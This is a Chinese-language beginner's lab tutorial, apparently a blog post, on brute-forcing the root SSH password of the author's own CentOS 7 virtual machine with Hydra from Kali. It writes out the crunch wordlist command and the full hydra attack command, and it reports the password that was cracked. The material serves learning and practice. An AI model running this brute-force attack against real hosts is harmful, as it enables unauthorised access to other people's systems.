使用Kali 中 暴力破解軟件Hydra破解Xshell登錄密碼
搭建環境
做這個實驗呢是在虛擬機裏做的,我們要滿足一下條件才能確保實驗的成功
- 準備Kali
- 準備Centos7
- 準備Xshell(遠程登錄軟件)
- 所有pc機的ip地址在同一網段,互相能夠ping通
實驗目的
在物理機上使用Xshell 遠程訪問虛擬機上的linux,在不知道密碼的前提下
實驗開始
首先我們在物理機上打開Xshell軟件,輸入要遠程訪問的IP地址,也就是我們準備好的centos7,這時候提示輸入密碼
我們打開kali 找到hydra 打開 ,這裏顯示hydra當前版本,推薦使用新版
怎麼破解密碼呢?這裏就需要用到字典了,那麼字典在哪呢,hydra存放字典的位置在/usr/share/wordlists 路徑下
但是我們centos7上設置的密碼是6位的純數字,所以用不到那些字典
我們可以自己編寫一個字典
使用crunch指令編寫字典 想了解更詳細的crunch語法可以百度
在kali裏輸入:
crunch 6 6 012345
// 第一個6代表最小位數
//第二個6代表最大位數
//012345代表範圍
crunch 6 6 012345 -o pass.txt
// 將編寫的字典導入到pass.txt中
// 這個字典一共有46656種組合方式
我們現在創建好了字典就可以開始破解了
hydra -l root -P pass.txt -vV -t 5 ssh://192.168.139.1
// -l 是要破解的用戶名 在已知的情況下不用調用破解用戶名的字典
//-P 調用破解密碼的字典
// vV 顯示破解過程
// -t 線程
//ssh:// 要破解的IP地址
等待一下下,開始破解
在第160次破解下,破解出了密碼,現在我們回物理機的Xshell上驗證
輸入剛纔破解的密碼000423
破解成功 成功進入到目標主機,並且可以進行操作 
常見問題
輸入破解指令後沒有反應
如果你是第一次使用hydra的話,並且直接輸入hydra -l root -P pass.txt -vV -t 5 ssh:// xxx.xxx.xxx.xxx
確實代碼沒錯,爲啥沒反應不破解呢,因爲沒有創建字典,沒有pass.txt這個文件
破解前必須確認調用的字典真實存在
pc機之間無法互通的常見原因
常見的原因還需要根據具體的錯誤指令來判斷,這裏就說我自己碰到的吧
提示ip地址錯誤,常見原因
- IP地址不在一個網段上 192.168.10.1 192.168.10.2 確保第三段是一樣的
- 防火牆沒關
- 如果是虛擬機的話,檢查虛擬機是否使用的是VMNAT8模式 ,使用VMNAT8模式提供的網段
- 網關不一樣
- linux沒有開啓ssh端口
總結
初學kali,不到位的地方還請諒解,以上操作有不懂的地方可以評論
想了解更詳細的可以百度